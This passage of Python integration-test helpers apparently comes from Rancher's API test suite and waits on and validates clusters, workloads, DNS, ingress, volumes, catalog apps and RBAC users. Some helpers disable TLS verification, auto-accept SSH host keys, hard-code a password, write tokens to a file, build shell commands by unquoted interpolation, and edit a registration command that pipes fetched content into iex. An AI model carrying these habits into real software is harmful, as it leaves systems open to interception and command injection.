target_name_list, insecure=is_insecure) def get_target_names(p_client, workloads): pods = [] for workload in workloads: pod_list = p_client.list_pod(workloadId=workload.id).data pods.extend(pod_list) target_name_list = [] for pod in pods: target_name_list.append(pod.name) print("target name list:" + str(target_name_list)) return target_name_list def get_endpoint_url_for_workload(p_client, workload, timeout=600): fqdn_available = False url = "" start = time.time() while not fqdn_available: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for endpoint to be available") time.sleep(.5) workload_list = p_client.list_workload(uuid=workload.uuid).data assert len(workload_list) == 1 workload = workload_list[0] if hasattr(workload, 'publicEndpoints'): assert len(workload.publicEndpoints) > 0 url = "http://" url = url + workload.publicEndpoints[0]["addresses"][0] + ":" url = url + str(workload.publicEndpoints[0]["port"]) fqdn_available = True return url def wait_until_lb_is_active(url, timeout=300): start = time.time() while check_for_no_access(url): time.sleep(.5) print("No access yet") if time.time() - start > timeout: raise Exception('Timed out waiting for LB to become active') return def check_for_no_access(url, verify=False): try: requests.get(url, verify=verify) return False except requests.ConnectionError: print("Connection Error - " + url) return True def wait_until_active(url, timeout=120): start = time.time() while check_for_no_access(url): time.sleep(.5) print("No access yet") if time.time() - start > timeout: raise Exception('Timed out waiting for url ' 'to become active') return def wait_until_ok(url, timeout=120, headers={}): start = time.time() while not check_if_ok(url, headers=headers): time.sleep(.5) if time.time() - start > timeout: raise Exception( 'Timed out waiting for {0} to become ok'.format(url) ) return def check_if_ok(url, verify=False, headers={}): try: res = requests.head(url, verify=verify, headers=headers) if res.status_code == 200: return True return False except requests.ConnectionError: print("Connection Error - " + url) return False def validate_http_response(cmd, target_name_list, client_pod=None, insecure=False): if client_pod is None and cmd.startswith("http://"): wait_until_active(cmd, 60) target_hit_list = target_name_list[:] count = 5 * len(target_name_list) for i in range(1, count): if len(target_hit_list) == 0: break if client_pod is None: curl_cmd = "curl " + cmd if insecure: curl_cmd += "\t--insecure" result = run_command(curl_cmd) else: if is_windows(): wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \ '"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \ '{0}).Content }}"'.format(cmd) else: wget_cmd = "wget -qO- " + cmd result = kubectl_pod_exec(client_pod, wget_cmd) result = result.decode() result = result.rstrip() assert result in target_name_list if result in target_hit_list: target_hit_list.remove(result) print("After removing all, the rest is: ", target_hit_list) assert len(target_hit_list) == 0 def validate_cluster(client, cluster, intermediate_state="provisioning", check_intermediate_state=True, skipIngresscheck=True, nodes_not_in_active_state=[], k8s_version="", userToken=USER_TOKEN): # Allow sometime for the "cluster_owner" CRTB to take effect time.sleep(5) cluster = validate_cluster_state( client, cluster, check_intermediate_state=check_intermediate_state, intermediate_state=intermediate_state, nodes_not_in_active_state=nodes_not_in_active_state) # Create Daemon set workload and have an Ingress with Workload # 
rule pointing to this daemonset create_kubeconfig(cluster) if k8s_version != "": check_cluster_version(cluster, k8s_version) if hasattr(cluster, 'rancherKubernetesEngineConfig'): check_cluster_state(len(get_role_nodes(cluster, "etcd", client))) project, ns = create_project_and_ns(userToken, cluster) p_client = get_project_client_for_token(project, userToken) con = [{"name": "test1", "image": TEST_IMAGE}] name = random_test_name("default") workload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id, daemonSetConfig={}) validate_workload(p_client, workload, "daemonSet", ns.name, len(get_schedulable_nodes(cluster, client))) if not skipIngresscheck: pods = p_client.list_pod(workloadId=workload["id"]).data scale = len(pods) # test service discovery validate_service_discovery(workload, scale, p_client, ns, pods) host = "test" + str(random_int(10000, 99999)) + ".com" path = "/name.html" rule = {"host": host, "paths": [{"workloadIds": [workload.id], "targetPort": "80"}]} ingress = p_client.create_ingress(name=name, namespaceId=ns.id, rules=[rule]) wait_for_ingress_to_active(p_client, ingress) validate_ingress(p_client, cluster, [workload], host, path) return cluster def check_cluster_version(cluster, version): cluster_k8s_version = \ cluster.appliedSpec["rancherKubernetesEngineConfig"][ "kubernetesVersion"] assert cluster_k8s_version == version, \ "cluster_k8s_version: " + cluster_k8s_version + \ " Expected: " + version expected_k8s_version = version[:version.find("-")] k8s_version = execute_kubectl_cmd("version") kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"] assert kubectl_k8s_version == expected_k8s_version, \ "kubectl version: " + kubectl_k8s_version + \ " Expected: " + expected_k8s_version def check_cluster_state(etcd_count): css_resp = execute_kubectl_cmd("get cs") css = css_resp["items"] components = ["scheduler", "controller-manager"] for i in range(0, etcd_count): components.append("etcd-" + str(i)) print("components to check - " + str(components)) for cs in css: component_name = cs["metadata"]["name"] assert component_name in components components.remove(component_name) assert cs["conditions"][0]["status"] == "True" assert cs["conditions"][0]["type"] == "Healthy" assert len(components) == 0 def validate_dns_record(pod, record, expected): # requires pod with `dig` available - TEST_IMAGE host = '{0}.{1}.svc.cluster.local'.format( record["name"], record["namespaceId"]) validate_dns_entry(pod, host, expected) def validate_dns_entry(pod, host, expected): if is_windows(): validate_dns_entry_windows(pod, host, expected) return # requires pod with `dig` available - TEST_IMAGE cmd = 'ping -c 1 -W 1 {0}'.format(host) ping_output = kubectl_pod_exec(pod, cmd) ping_validation_pass = False for expected_value in expected: if expected_value in str(ping_output): ping_validation_pass = True break assert ping_validation_pass is True assert " 0% packet loss" in str(ping_output) dig_cmd = 'dig {0} +short'.format(host) dig_output = kubectl_pod_exec(pod, dig_cmd) for expected_value in expected: assert expected_value in str(dig_output) def validate_dns_entry_windows(pod, host, expected): def ping_check(): ping_cmd = 'ping -w 1 -n 1 {0}'.format(host) ping_output = kubectl_pod_exec(pod, ping_cmd) ping_validation_pass = False for expected_value in expected: if expected_value in str(ping_output): ping_validation_pass = True break return ping_validation_pass and (" (0% loss)" in str(ping_output)) wait_for(callback=ping_check, timeout_message="Failed to ping {0}".format(host)) 
def dig_check(): dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \ '"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host) dig_output = kubectl_pod_exec(pod, dig_cmd) dig_validation_pass = True for expected_value in expected: if expected_value not in str(dig_output): dig_validation_pass = False break return dig_validation_pass wait_for(callback=dig_check, timeout_message="Failed to resolve {0}".format(host)) def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT): """ Checks whether dns_record got deleted successfully. Validates if dns_record is null in for current object client. @param client: Object client use to create dns_record @param dns_record: record object subjected to be deleted @param timeout: Max time to keep checking whether record is deleted or not """ time.sleep(2) start = time.time() records = client.list_dns_record(name=dns_record.name, ).data while len(records) != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for record {} to be deleted" "".format(dns_record.name)) time.sleep(.5) records = client.list_dns_record(name=dns_record.name, ).data def wait_for_nodes_to_become_active(client, cluster, exception_list=[], retry_count=0): nodes = client.list_node(clusterId=cluster.id).data node_auto_deleted = False for node in nodes: if node.requestedHostname not in exception_list: node = wait_for_node_status(client, node, "active") if node is None: print("Need to re-evalauate new node list") node_auto_deleted = True retry_count += 1 print("Retry Count:" + str(retry_count)) if node_auto_deleted and retry_count < 5: wait_for_nodes_to_become_active(client, cluster, exception_list, retry_count) def wait_for_node_status(client, node, state): uuid = node.uuid start = time.time() nodes = client.list_node(uuid=uuid).data node_count = len(nodes) # Handle the case of nodes getting auto deleted when they are part of # nodepools if node_count == 1: node_status = nodes[0].state else: print("Node does not exist anymore -" + uuid) return None while node_status != state: if time.time() - start > MACHINE_TIMEOUT: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(5) nodes = client.list_node(uuid=uuid).data node_count = len(nodes) if node_count == 1: node_status = nodes[0].state else: print("Node does not exist anymore -" + uuid) return None return node def wait_for_node_to_be_deleted(client, node, timeout=300): uuid = node.uuid start = time.time() nodes = client.list_node(uuid=uuid).data node_count = len(nodes) while node_count != 0: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nodes = client.list_node(uuid=uuid).data node_count = len(nodes) def wait_for_cluster_node_count(client, cluster, expected_node_count, timeout=300): start = time.time() nodes = client.list_node(clusterId=cluster.id).data node_count = len(nodes) while node_count != expected_node_count: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nodes = client.list_node(clusterId=cluster.id).data node_count = len(nodes) def get_custom_host_registration_cmd(client, cluster, roles, node): allowed_roles = ["etcd", "worker", "controlplane"] cluster_tokens = client.list_cluster_registration_token( clusterId=cluster.id).data if len(cluster_tokens) > 0: cluster_token = cluster_tokens[0] else: cluster_token = create_custom_host_registration_token(client, cluster) additional_options = " --address " + 
node.public_ip_address + \ " --internal-address " + node.private_ip_address if 'Administrator' == node.ssh_user: cmd = cluster_token.windowsNodeCommand cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ') else: cmd = cluster_token.nodeCommand for role in roles: assert role in allowed_roles cmd += " --" + role cmd += additional_options return cmd def create_custom_host_registration_token(client, cluster): # Allow sometime for the "cluster_owner" CRTB to take effect time.sleep(5) cluster_token = client.create_cluster_registration_token( clusterId=cluster.id) cluster_token = client.wait_success(cluster_token) assert cluster_token.state == 'active' return cluster_token def get_cluster_by_name(client, name): clusters = client.list_cluster(name=name).data assert len(clusters) == 1, "Cluster " + name + " does not exist" return clusters[0] def get_cluster_type(client, cluster): cluster_configs = [ "amazonElasticContainerServiceConfig", "azureKubernetesServiceConfig", "googleKubernetesEngineConfig", "rancherKubernetesEngineConfig" ] if "rancherKubernetesEngineConfig" in cluster: nodes = client.list_node(clusterId=cluster.id).data if len(nodes) > 0: if nodes[0].nodeTemplateId is None: return "Custom" for cluster_config in cluster_configs: if cluster_config in cluster: return cluster_config return "Imported" def delete_cluster(client, cluster): nodes = client.list_node(clusterId=cluster.id).data # Delete nodes(in cluster) from AWS for Imported and Custom Cluster if len(nodes) > 0: cluster_type = get_cluster_type(client, cluster) print(cluster_type) if get_cluster_type(client, cluster) in ["Imported", "Custom"]: filters = [ {'Name': 'tag:Name', 'Values': ['testcustom*', 'teststress*', 'testsa*']}] ip_filter = {} ip_list = [] ip_filter['Name'] = \ 'network-interface.addresses.association.public-ip' ip_filter['Values'] = ip_list filters.append(ip_filter) for node in nodes: host_ip = resolve_node_ip(node) ip_list.append(host_ip) assert len(ip_filter) > 0 print(ip_filter) aws_nodes = AmazonWebServices().get_nodes(filters) if aws_nodes is None: # search instances by IPs in case names do not follow patterns aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter]) if aws_nodes is None: print("no instance is found in AWS") else: for node in aws_nodes: print(node.public_ip_address) AmazonWebServices().delete_nodes(aws_nodes) # Delete Cluster client.delete(cluster) def check_connectivity_between_workloads(p_client1, workload1, p_client2, workload2, allow_connectivity=True): wl1_pods = p_client1.list_pod(workloadId=workload1.id).data wl2_pods = p_client2.list_pod(workloadId=workload2.id).data for pod in wl1_pods: for o_pod in wl2_pods: check_connectivity_between_pods(pod, o_pod, allow_connectivity) def check_connectivity_between_workload_pods(p_client, workload): pods = p_client.list_pod(workloadId=workload.id).data for pod in pods: for o_pod in pods: check_connectivity_between_pods(pod, o_pod) def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True): pod_ip = pod2.status.podIp cmd = "ping -c 1 -W 1 " + pod_ip if is_windows(): cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip) response = kubectl_pod_exec(pod1, cmd) assert pod_ip in str(response) if allow_connectivity: if is_windows(): assert " (0% loss)" in str(response) else: assert " 0% packet loss" in str(response) else: if is_windows(): assert " (100% loss)" in str(response) else: assert " 100% packet loss" in str(response) def kubectl_pod_exec(pod, cmd): command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd 
return execute_kubectl_cmd(command, json_out=False, stderr=True) def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None): ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if sshKey: ssh.connect(ip, username=user, key_filename=sshKey, port=port) else: ssh.connect(ip, username=user, password=password, port=port) stdin, stdout, stderr = ssh.exec_command(cmd) response = stdout.readlines() return response def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) nss = client.list_namespace(uuid=ns.uuid).data assert len(nss) == 1 ns = nss[0] while ns.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) nss = client.list_namespace(uuid=ns.uuid).data assert len(nss) == 1 ns = nss[0] return ns def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods, timeout=DEFAULT_TIMEOUT): start = time.time() for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) for x in range(0, numofpods - 1): pod = pods["items"][x] podimage = pod["spec"]["containers"][0]["image"] while podimage != expectedimage: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for correct pod images") time.sleep(.5) pods = execute_kubectl_cmd(get_pods) pod = pods["items"][x] podimage = pod["spec"]["containers"][0]["image"] def wait_for_pods_in_workload(p_client, workload, pod_count, timeout=DEFAULT_TIMEOUT): start = time.time() pods = p_client.list_pod(workloadId=workload.id).data while len(pods) != pod_count: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for pods in workload {}. Expected {}. 
" "Got {}".format(workload.name, pod_count, len(pods))) time.sleep(.5) pods = p_client.list_pod(workloadId=workload.id).data return pods def get_user_client_and_cluster(client=None): if not client: client = get_user_client() if CLUSTER_NAME == "": clusters = client.list_cluster().data else: clusters = client.list_cluster(name=CLUSTER_NAME).data assert len(clusters) > 0 cluster = clusters[0] return client, cluster def get_global_admin_client_and_cluster(): client = get_admin_client() if CLUSTER_NAME == "": clusters = client.list_cluster().data else: clusters = client.list_cluster(name=CLUSTER_NAME).data assert len(clusters) > 0 cluster = clusters[0] return client, cluster def validate_cluster_state(client, cluster, check_intermediate_state=True, intermediate_state="provisioning", nodes_not_in_active_state=[]): if check_intermediate_state: cluster = wait_for_condition( client, cluster, lambda x: x.state == intermediate_state, lambda x: 'State is: ' + x.state, timeout=MACHINE_TIMEOUT) assert cluster.state == intermediate_state cluster = wait_for_condition( client, cluster, lambda x: x.state == "active", lambda x: 'State is: ' + x.state, timeout=MACHINE_TIMEOUT) assert cluster.state == "active" wait_for_nodes_to_become_active(client, cluster, exception_list=nodes_not_in_active_state) timeout = 60 start = time.time() while "version" not in cluster.keys(): time.sleep(1) cluster = client.reload(cluster) delta = time.time() - start if delta > timeout: msg = "Timeout waiting for K8s version to be synced" raise Exception(msg) return cluster def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT): start = time.time() sleep = 0.01 while True: time.sleep(sleep) sleep *= 2 if sleep > 2: sleep = 2 try: obj = client.reload(obj) except ApiError as e: if e.error.status != 403: raise e else: return obj delta = time.time() - start if delta > timeout: msg = 'Timeout waiting for [{}:{}] for condition after {}' \ ' seconds'.format(obj.type, obj.id, delta) raise Exception(msg) def delete_node(aws_nodes): for node in aws_nodes: AmazonWebServices().delete_node(node) def cluster_cleanup(client, cluster, aws_nodes=None): if RANCHER_CLEANUP_CLUSTER: client.delete(cluster) if aws_nodes is not None: delete_node(aws_nodes) else: env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n" env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n" env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n" env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n" create_config_file(env_details) def create_config_file(env_details): file = open(env_file, "w") file.write(env_details) file.close() def validate_hostPort(p_client, workload, source_port, cluster): get_endpoint_url_for_workload(p_client, workload) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] assert source_port == source_port_wk, "Source ports do not match" pods = p_client.list_pod(workloadId=workload.id).data nodes = get_schedulable_nodes(cluster) for node in nodes: target_name_list = [] for pod in pods: print(pod.nodeId + " check " + node.id) if pod.nodeId == node.id: target_name_list.append(pod.name) break if len(target_name_list) > 0: host_ip = resolve_node_ip(node) curl_cmd = " http://" + host_ip + ":" + \ str(source_port) + "/name.html" validate_http_response(curl_cmd, target_name_list) def validate_lb(p_client, workload, source_port): url = get_endpoint_url_for_workload(p_client, workload) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] 
assert source_port == source_port_wk, "Source ports do not match" target_name_list = get_target_names(p_client, [workload]) wait_until_lb_is_active(url) validate_http_response(url + "/name.html", target_name_list) def validate_nodePort(p_client, workload, cluster, source_port): get_endpoint_url_for_workload(p_client, workload, 600) wl = p_client.list_workload(uuid=workload.uuid).data[0] source_port_wk = wl.publicEndpoints[0]["port"] assert source_port == source_port_wk, "Source ports do not match" nodes = get_schedulable_nodes(cluster) pods = p_client.list_pod(workloadId=wl.id).data target_name_list = [] for pod in pods: target_name_list.append(pod.name) print("target name list:" + str(target_name_list)) for node in nodes: host_ip = resolve_node_ip(node) curl_cmd = " http://" + host_ip + ":" + \ str(source_port_wk) + "/name.html" validate_http_response(curl_cmd, target_name_list) def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port): pods = p_client.list_pod(workloadId=workload.id).data target_name_list = [] for pod in pods: target_name_list.append(pod["name"]) curl_cmd = "http://" + cluster_ip + ":" + \ str(source_port) + "/name.html" for pod in test_pods: validate_http_response(curl_cmd, target_name_list, pod) def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) list = c_client.list_persistent_volume(uuid=pv_object.uuid).data assert len(list) == 1 pv = list[0] while pv.state != "available": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to available") time.sleep(.5) list = c_client.list_persistent_volume(uuid=pv_object.uuid).data assert len(list) == 1 pv = list[0] return pv def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT): start = time.time() time.sleep(2) list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data assert len(list) == 1 pvc = list[0] while pvc.state != "bound": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to bound") time.sleep(.5) list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data assert len(list) == 1 pvc = list[0] return pvc def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name, mount_path, sub_path, is_daemonSet=False): volumes = [{"type": "volume", "name": "vol1", "persistentVolumeClaim": { "readOnly": "false", "type": "persistentVolumeClaimVolumeSource", "persistentVolumeClaimId": pvc_name }}] volumeMounts = [{"readOnly": "False", "type": "volumeMount", "mountPath": mount_path, "subPath": sub_path, "name": "vol1" }] con = [{"name": "test1", "image": TEST_IMAGE, "volumeMounts": volumeMounts }] if is_daemonSet: workload = p_client.create_workload(name=wl_name, containers=con, namespaceId=ns_id, volumes=volumes, daemonSetConfig={}) else: workload = p_client.create_workload(name=wl_name, containers=con, namespaceId=ns_id, volumes=volumes) return workload def write_content_to_file(pod, content, filename): cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content) if is_windows(): cmd_write = \ 'powershell -NoLogo -NonInteractive -Command ' \ '"& { echo {1} > {0} }"'.format(filename, content) output = kubectl_pod_exec(pod, cmd_write) assert output.strip().decode('utf-8') == "" def validate_file_content(pod, content, filename): cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename) if is_windows(): cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \ '"& { cat {0} }"'.format(filename) output = 
kubectl_pod_exec(pod, cmd_get_content) assert output.strip().decode('utf-8') == content def wait_for_mcapp_to_active(client, multiClusterApp, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): time.sleep(5) # When the app is deployed it goes into Active state for a short # period of time and then into installing/deploying. mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid, name=multiClusterApp.name).data start = time.time() assert len(mcapps) == 1, "Cannot find multi cluster app" mapp = mcapps[0] while mapp.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) multiclusterapps = client.list_multiClusterApp( uuid=multiClusterApp.uuid, name=multiClusterApp.name).data assert len(multiclusterapps) == 1 mapp = multiclusterapps[0] return mapp def wait_for_app_to_active(client, app_id, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): """ First wait for app to come in deployment state, then wait for it get in active state. This is to avoid wrongly conclude that app is active as app goes to state installing > active > deploying > active @param client: Project client @param app_id: App id of deployed app. @param timeout: Max time allowed to wait for app to become active. @return: app object """ start = time.time() app_data = client.list_app(id=app_id).data while len(app_data) == 0: if time.time() - start > timeout / 10: raise AssertionError( "Timed out waiting for listing the app from API") time.sleep(.2) app_data = client.list_app(id=app_id).data application = app_data[0] while application.state != "deploying": if time.time() - start > timeout / 3: break time.sleep(.2) app_data = client.list_app(id=app_id).data application = app_data[0] while application.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) app = client.list_app(id=app_id).data assert len(app) >= 1 application = app[0] return application def validate_response_app_endpoint(p_client, appId, timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT): ingress_list = p_client.list_ingress(namespaceId=appId).data assert len(ingress_list) == 1 ingress = ingress_list[0] if hasattr(ingress, 'publicEndpoints'): for public_endpoint in ingress.publicEndpoints: url = \ public_endpoint["protocol"].lower() + "://" + \ public_endpoint["hostname"] print(url) start = time.time() try: while True: r = requests.head(url) print(r.status_code) if r.status_code == 200: return if time.time() - start > timeout: raise AssertionError( "Timed out waiting response to be 200.") time.sleep(.5) except requests.ConnectionError: print("failed to connect") assert False, "failed to connect to the app" def resolve_node_ip(node): if hasattr(node, 'externalIpAddress'): node_ip = node.externalIpAddress else: node_ip = node.ipAddress return node_ip def provision_nfs_server(): node = AmazonWebServices().create_node(random_test_name("nfs-server")) node.wait_for_ssh_ready() c_path = os.getcwd() cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh" command = open(cmd_path, 'r').read() node.execute_command(command) return node def get_defaut_question_answers(client, externalId): def get_answer(quest): if "default" in quest.keys(): answer = quest["default"] else: answer = "" # If required and no default value is available, set fake value # only for type string . 
For other types error out if "required" in quest.keys(): if quest["required"]: if quest["type"] == "enum" and "options" in quest.keys(): answer = quest["options"][0] elif quest["type"] == "password": answer = "R@ncher135" elif quest["type"] == "string": answer = "fake" else: assert False, \ "Cannot set default for types {}" \ "".format(quest["type"]) return answer def check_if_question_needed(questions_and_answers, ques): add_question = False match_string = ques["showIf"] match_q_as = match_string.split("&&") for q_a in match_q_as: items = q_a.split("=") if len(items) == 1: items.append("") if items[0] in questions_and_answers.keys(): if questions_and_answers[items[0]] == items[1]: add_question = True else: add_question = False break return add_question questions_and_answers = {} print("external id = {}".format(externalId)) template_revs = client.list_template_version(externalId=externalId).data assert len(template_revs) == 1 template_rev = template_revs[0] questions = template_rev.questions for ques in questions: add_question = True if "showIf" in ques.keys(): add_question = \ check_if_question_needed(questions_and_answers, ques) if add_question: question = ques["variable"] answer = get_answer(ques) questions_and_answers[question] = get_answer(ques) if "showSubquestionIf" in ques.keys(): if ques["showSubquestionIf"] == answer: sub_questions = ques["subquestions"] for sub_question in sub_questions: question = sub_question["variable"] questions_and_answers[question] = \ get_answer(sub_question) print("questions_and_answers = {}".format(questions_and_answers)) return questions_and_answers def validate_app_deletion(client, app_id, timeout=DEFAULT_APP_DELETION_TIMEOUT): app_data = client.list_app(id=app_id).data start = time.time() if len(app_data) == 0: return application = app_data[0] while application.state == "removing": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for app to delete") time.sleep(.5) app = client.list_app(id=app_id).data if len(app) == 0: break def validate_catalog_app(proj_client, app, external_id, answer=None): """ This method validates all the workloads deployed are in active state, have correct version and validates the answers. @param proj_client: Project client object of a existing project. @param app: Deployed app object. @param external_id: URl of app API. @param answer: answer, app seek while deploying, body of the post call. @return: Deployed app object. """ if answer is None: answers = get_defaut_question_answers(get_user_client(), external_id) else: answers = answer # validate app is active app = wait_for_app_to_active(proj_client, app.id) assert app.externalId == external_id, \ "the version of the app is not correct" # check if associated workloads are active ns = app.targetNamespace parameters = external_id.split('&') assert len(parameters) > 1, \ "Incorrect list of parameters from catalog external ID" chart_prefix = parameters[len(parameters) - 2].split("=")[1] chart_suffix = parameters[len(parameters) - 1].split("=")[1] chart = chart_prefix + "-" + chart_suffix app_name = parameters[len(parameters) - 2].split("=")[1] workloads = proj_client.list_workload(namespaceId=ns).data for wl in workloads: print("Workload {} , state - {}".format(wl.id, wl.state)) assert wl.state == "active" chart_deployed = get_chart_info(wl.workloadLabels) print("Chart detail of app - {}".format(chart_deployed)) # '-' check is to make sure chart has both app name and version. 
if app_name in chart_deployed and '-' in chart_deployed: assert chart_deployed == chart, "the chart version is wrong" # Validate_app_answers assert len(answers.items() - app["answers"].items()) == 0, \ "Answers are not same as the original catalog answers" return app def get_chart_info(workloadlabels): """ This method finds either 'chart' tag or 'helm.sh/chart' tag from workload API @param workloadlabels: workloadslabel object @return: chart value of workload e.g. 'app_name-version' """ if "chart" in workloadlabels.keys(): return workloadlabels.chart elif "helm.sh/chart" in workloadlabels.keys(): return workloadlabels["helm.sh/chart"] else: return '' def create_user(client, cattle_auth_url=CATTLE_AUTH_URL): user_name = random_name() user = client.create_user(username=user_name, password=USER_PASSWORD) client.create_global_role_binding(globalRoleId="user", subjectKind="User", userId=user.id) user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url) return user, user_token def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL): r = requests.post(cattle_auth_url, json={ 'username': username, 'password': password, 'responseType': 'json', }, verify=False) print(r.json()) return r.json()["token"] def rbac_get_user_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["user"] return None def rbac_get_user_token_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["token"] return None def rbac_get_kubeconfig_by_role(role): if role in rbac_data["users"].keys(): return rbac_data["users"][role]["kubeconfig"] return None def rbac_get_project(): return rbac_data["project"] def rbac_get_namespace(): return rbac_data["namespace"] def rbac_get_workload(): return rbac_data["workload"] def rbac_get_unshared_project(): return rbac_data["p_unshared"] def rbac_get_unshared_ns(): return rbac_data["ns_unshared"] def rbac_get_unshared_workload(): return rbac_data["wl_unshared"] def rbac_prepare(): """this function creates one project, one namespace, and four users with different roles""" admin_client, cluster = get_global_admin_client_and_cluster() create_kubeconfig(cluster) # create a new project in the cluster project, ns = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-test-rbac")) con = [{"name": "test1", "image": TEST_IMAGE}] name = random_test_name("default") p_client = get_project_client_for_token(project, ADMIN_TOKEN) workload = p_client.create_workload(name=name, containers=con, namespaceId=ns.id) validate_workload(p_client, workload, "deployment", ns.name) rbac_data["workload"] = workload rbac_data["project"] = project rbac_data["namespace"] = ns # create new users for key in rbac_data["users"]: user1, token1 = create_user(admin_client) rbac_data["users"][key]["user"] = user1 rbac_data["users"][key]["token"] = token1 # assign different role to each user assign_members_to_cluster(admin_client, rbac_data["users"][CLUSTER_OWNER]["user"], cluster, CLUSTER_OWNER) assign_members_to_cluster(admin_client, rbac_data["users"][CLUSTER_MEMBER]["user"], cluster, CLUSTER_MEMBER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_MEMBER]["user"], project, PROJECT_MEMBER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_OWNER]["user"], project, PROJECT_OWNER) assign_members_to_project(admin_client, rbac_data["users"][PROJECT_READ_ONLY]["user"], project, PROJECT_READ_ONLY) # create kubeconfig files for each user for key in rbac_data["users"]: user_client = 
get_client_for_token(rbac_data["users"][key]["token"]) _, user_cluster = get_user_client_and_cluster(user_client) rbac_data["users"][key]["kubeconfig"] = os.path.join( os.path.dirname(os.path.realpath(__file__)), key + "_kubeconfig") create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"]) # create another project that none of the above users are assigned to p2, ns2 = create_project_and_ns(ADMIN_TOKEN, cluster, random_test_name("p-unshared")) name = random_test_name("default") p_client = get_project_client_for_token(p2, ADMIN_TOKEN) workload = p_client.create_workload(name=name, containers=con, namespaceId=ns2.id) validate_workload(p_client, workload, "deployment", ns2.name) rbac_data["p_unshared"] = p2 rbac_data["ns_unshared"] = ns2 rbac_data["wl_unshared"] = workload def rbac_cleanup(): """ remove the project, namespace and users created for the RBAC tests""" try: client = get_admin_client() except Exception: print("Not able to get admin client. Not performing RBAC cleanup") return for _, value in rbac_data["users"].items(): try: client.delete(value["user"]) except Exception: pass client.delete(rbac_data["project"]) client.delete(rbac_data["wl_unshared"]) client.delete(rbac_data["p_unshared"]) def check_condition(condition_type, status): def _find_condition(resource): if not hasattr(resource, "conditions"): return False if resource.conditions is None: return False for condition in resource.conditions: if condition.type == condition_type and condition.status == status: return True return False return _find_condition def create_catalog_external_id(catalog_name, template, version, project_cluster_id=None, catalog_type=None): if catalog_type is None: return "catalog://?catalog=" + catalog_name + \ "&template=" + template + "&version=" + version elif catalog_type == "project" or catalog_type == "cluster": return "catalog://?catalog=" + project_cluster_id + "/" \ + catalog_name + "&type=" + catalog_type \ + "Catalog&template=" + template + "&version=" + version def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT): time.sleep(2) catalog_data = client.list_catalog(name=catalog.name) print(catalog_data) start = time.time() assert len(catalog_data["data"]) >= 1, "Cannot find catalog" catalog = catalog_data["data"][0] while catalog.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) catalog_data = client.list_catalog(name=catalog.name) assert len(catalog_data["data"]) >= 1 catalog = catalog_data["data"][0] return catalog def readDataFile(data_dir, name): fname = os.path.join(data_dir, name) print("File: " + fname) is_file = os.path.isfile(fname) assert is_file with open(fname) as f: return f.read() def set_url_password_token(RANCHER_SERVER_URL): """Returns a ManagementContext for the default global admin user.""" 